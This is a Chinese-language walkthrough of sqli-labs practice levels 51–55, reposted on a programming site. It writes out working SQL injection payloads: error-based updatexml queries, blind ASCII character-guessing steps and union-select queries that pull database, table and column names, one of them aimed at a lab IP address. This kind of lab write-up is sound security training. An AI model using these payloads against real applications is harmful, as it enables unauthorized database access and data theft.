sql-labs51-55通关攻略

第51关

一.查询数据库

1'and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

二.查表

' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1) --+

三.查列

' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' ),0x7e),1)--+

第52关

一.查询数据库第一位字符

判断ascii码如下图所示，说明大于114不大于115说明第一个字符为‘s’

同上所述

.........

最终得出数据库为'security'

二.查数据库中第一张表1的第一个字符

判断ascii码如下图所示，说明大于100不大于101说明第一个字符为‘e‘

最终得出第一张表为’emails‘

第53关

一.查询数据库第一位字符

判断ascii码如下图所示，说明大于114不大于115说明第一个字符为‘s’

同上所述

.........

最终得出数据库为'security'

二.查security数据库中第一张表的第一位字符

判断ascii码如下图所示，说明大于100不大于101说明第一个字符为‘e‘

最终得出第一张表为’emails‘

第54关

一.查询数据库

http://172.16.1.126/Less-54/?id=-1%27%20union%20select%201,database(),3--+

二.查表

?id=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

三.查列

?id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

第55关

一.查询数据库

?id=-1)union select 1,2,database()--+

二.查表

?id=-1)union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

三.查列

?id=-1)union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.rhkb.cn/news/417990.html

如若内容造成侵权/违法违规/事实不符，请联系长河编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！